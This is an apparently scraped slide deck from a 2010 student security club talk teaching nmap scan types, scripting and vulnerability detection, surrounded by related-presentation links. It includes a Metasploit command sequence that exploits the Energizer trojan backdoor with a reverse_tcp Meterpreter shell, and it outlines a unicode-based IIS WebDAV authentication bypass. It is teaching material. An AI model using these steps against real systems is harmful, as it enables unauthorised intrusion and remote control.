4/13/2010.  CSS Meeting  Stephen Crane on Programming Contests  1pm  Building 8 room 345 05/11/10.

Slides:



Advertisements
Similar presentations
Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.
Advertisements

 Dynamic policies o Change as system security state/load changes o GAA architecture  Extended access control lists  Pre-, mid- and post-conditions,
NMAP Scanning Options. EC-Council NMAP  Nmap is the most popular scanning tool used on the Internet.  Cretead by Fyodar ( it.
Hands-On Ethical Hacking and Network Defense Second Edition Chapter 5 Port Scanning.
Hacking Exposed 7 Network Security Secrets & Solutions Chapter 2 Scanning 1.
System Security Scanning and Discovery Chapter 14.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
Intruder Trends Tom Longstaff CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh, PA Sponsored by.
Scanning February 23, 2010 MIS 4600 – MBA © Abdou Illia.
1 Colorado University Guest Lecture: Vulnerability Assessment Chris Triolo Spring 2007.
Assessing Vulnerabilities ISA 4220 Server Systems Security James A. Edge Jr., CISSP, CISM, CISA, CPTE, MCSE Sr. Security Analyst Cincinnati Bell Technology.
Information Networking Security and Assurance Lab National Chung Cheng University 1 A Real World Attack: wu-ftp.
Information Networking Security and Assurance Lab National Chung Cheng University 2004/03/031 A Real World Attack: wu-ftp Cao er kai ( 曹爾凱 )
Computer Security and Penetration Testing
1 Presentation ISS Security Scanner & Retina by Adnan Khairi
Guide to Operating System Security Chapter 2 Viruses, Worms, and Malicious Software.
Internet Relay Chat Chandrea Dungy Derek Garrett #29.
Penetration Testing.
Nikto LUCA ALEXANDRA ADELA. Nikto  Web server assessment tool  Written by Chris Solo and David Lodge  Released on December 27, 2001  Stable release:
Port Scanning.
W3af LUCA ALEXANDRA ADELA – MISS 1. w3af  Web Application Attack and Audit Framework  Secures web applications by finding and exploiting web application.
Ana Chanaba Robert Huylo
1 Reconnaissance, Network Mapping, and Vulnerability Assessment ECE4112 – Internetwork Security Georgia Institute of Technology.
Karlstad University Introduction to Vulnerability Assessment Labs Ge Zhang Dvg-C03.
EECS 354 Network Security Metasploit Features. Hacking on the Internet Vulnerabilities are always being discovered 0day vulnerabilities Every server or.
This courseware is copyrighted © 2015 gtslearning. No part of this courseware or any training material supplied by gtslearning International Limited to.
FORESEC Academy FORESEC Academy Security Essentials (III)
Snort & Nmap Mike O’Connor Eric Tallman Matt Yasiejko.
Adrian Crenshaw.  I run Irongeek.com  I have an interest in InfoSec education  I don’t know everything - I’m.
MIS Week 4 Site:
Hands on with BackTrack Information gathering, scanning, simple exploits By Edison Carrick.
Linux Networking and Security
Network Assessment How intrusion techniques contribute to system/network security Network and system monitoring System mapping Ports, OS, applications.
Scanning & Enumeration Lab 3 Once attacker knows who to attack, and knows some of what is there (e.g. DNS servers, mail servers, etc.) the next step is.
Trinity Uses Nmap, shouldn’t you?. From “The Art of War” "... knowing your enemy 100% of the time, you will win your battle 100% of the time, knowing.
1 Figure 4-1: Targeted System Penetration (Break-In Attacks) Host Scanning  Ping often is blocked by firewalls  Send TCP SYN/ACK to generate RST segments.
1 Security Penetration Testing Angela Davis Mrinmoy Ghosh ECE4112 – Internetwork Security Georgia Institute of Technology.
Penetration Testing 101 (Boot-camp)
Topics Network topology Virtual LAN Port scanners and utilities Packet sniffers Weak protocols Practical exercise.
Hacking Windows 9X/ME. Hacking framework Initial access physical access brute force trojans Privilege escalation Administrator, root privileges Consolidation.
BY SYDNEY FERNANDES T.E COMP ROLL NO: INTRODUCTION Networks are used as a medium inorder to exchange data packets between the server and clients.
Retina Network Security Scanner
Polytechnic University Introduction1 CS 393/682: Network Security Professor Keith W. Ross.
IT 463 – Scanning Assignment Shane Knisley Erik Bennett.
Kali Linux BY BLAZE STERLING. Roadmap  What is Kali Linux  Installing Kali Linux  Included Tools  In depth included tools  Conclusion.
Penetration Testing By Blaze Sterling. Roadmap What is Penetration Testing How is it done? Penetration Testing Tools Kali Linux In depth included tools.
Network and Port Scanning Chien-Chung Shen
/Reimage-Repair-Tool/ /u/6/b/ /channel/UCo47kkB-idAA-IMJSp0p7tQ /alexwaston14/reimage-system-repair/
Jen Beveridge and Joe Kolenda. Developed by Gordon Lyon Features –Host discovery –Port scanning –Version detecting –OS detection –Scriptable interaction.
Top 10 Hacking Tool Welcome TO hackaholic Kumar shubham.
Common System Exploits Tom Chothia Computer Security, Lecture 17.
Microsoft OS Vulnerabilities April 1, 2010 MIS 4600 – MBA © Abdou Illia.
Protection (tools).
Jen Beveridge and Joe Kolenda
Penetration Testing Scanning
Port Scanning James Tate II
ETHICAL HACKING WHAT EXACTLY IS ETHICAL HACKING ? By : Bijay Acharya
Introduction to Network Scanning
CITA 352 Chapter 5 Port Scanning.
Intro to Ethical Hacking
Network Exploitation Tool
Port Scanning (based on nmap tool)
Metasploit a one-stop hack shop
Module 22 (Metasploit Introduction)
CIT 480: Securing Computer Systems
Metasploit assignment
Intro to Ethical Hacking
6. Operating Systems Finger printing & Scanning
Metasploit Analysis Report Overview
EVAPI - Enumeration Auburn Hacking club
Presentation transcript:

4/13/2010

 CSS Meeting  Stephen Crane on Programming Contests  1pm  Building 8 room /11/10

 CSS Programming Contest  1pm  CS Lab, Building 8 05/11/10

 CBARN!  Buy your tickets today! ▪ $30  Great food!  Learn more about other clubs and the College of Business  This 7pm 05/11/10

 Programming Contest 05/11/10

 “Network Mapper” (scanner)  Discovery  Identification  Security Auditing 05/11/10

 Scan types  Ping:-sP  TCP:-sT  UDP:-sU  SYN:-sS  Idle:-sI 05/11/10

 Ping:-sP  Checks 80, 443 and icmp if root  Good way to map the machines on the network 05/11/10

 TCP:-sT  TCP Connect scan  Full TCP handshake  Very “noisey” 05/11/10

 UDP:-sU  Gives port info only  Often forgotten  SLOW 05/11/10

 SYN:-sS  “half open” scanning  “quiet” scan  Most IDS are on the look out for it 05/11/10

 Idle:-sI  Zombie scanning  Scans a machine using another  As far as the scanned machine knows, our computer never communicated with it  Only located ports, no version info  Doesn’t spoof mac address 05/11/10

Advanced Features  Version information (-sV)  Attempts to identify the version of the discovered service  Can make mistakes  OS Detection (-O)  More or less accurate  Can make mistakes

Advanced Features  Verbosity (-v[vv])  Gives more info  Very useful  grep is your friend  Runtime interaction  v/V:Adjust verbosity  Spacebar: Print status message

 Idle:-sI 05/11/10 Target Zombie Us

Demo

 Scripting engine  Custom written scans  Vulnerability scanning & exploitation (kinda)  Written in LUA 05/11/10

 Two types:  Service scripts  Host scripts  Nine categories  Auth  Default  Discovery  External  Intrusive  Malware  Safe  Version  Vuln 05/11/10

 Scripts location:  /usr/share/nmap/scripts  /usr/local/share/nmap/scripts  C:\Program Files\Nmap\scripts  nmap –script-updatedb  Command format:  nmap --script= target 05/11/10

Scripts  Energizer Trojan  IIS webDAV

Energizer Trojan Script  A backdoor was found in the Energizer Charger program  Might have been a mistake  We don't really care  Listens on port 7777 of the infected machine  Detection is now built-in to version scan  nmap -sV -p7777 target

Energizer Trojan Script  Metasploit!  Metasploit has a module that will exploit the trojan > use exploit/windows/backdoor/energizer_duo_payloa d > set rhost target.ip > set payload windows/meterpreter/reverse_tcp > set lhost your.ip > exploit

IIS WebDAV script  WebDAV allows users on a website to modify files on the webserver  A vulnerability was found in IIS 6.0 WebDAV implementation  Allows remote authentication bypass due to a parsing error of UNICODE characters  Nmap has a script!

IIS WebDAV script  The script can identify vulnerable files on the webserver  nmap --script http-iis-webdav-vuln.nse target

IIS WebDAV script  Let's exploit it manually  The vulnerable server improperly parses the UNICODE character '/' (0xc0 0xaf)  We'll use telnet to exploit

Extra Stuff  “default” script scan (-sC)  Scans using a bunch of different scripts  Very noisy, very intrusive  Gives you a lot of info  “Aggressive” scan (-A)  Uses -O -sV -sC --traceroute  Again, very noisy  But lots and lots of info

Closing remarks  nmap is a tool you should be familiar with  There are many more techniques and scans that I did not cover  Be mindful of who you are scanning (and any laws regarding scans)

Questions?

References  Nmap main site   nmap.org/book/nse.html  Comprehensive Guide to nmap  ml ml  SkullSecurity   WebDAV   Energizer Trojan 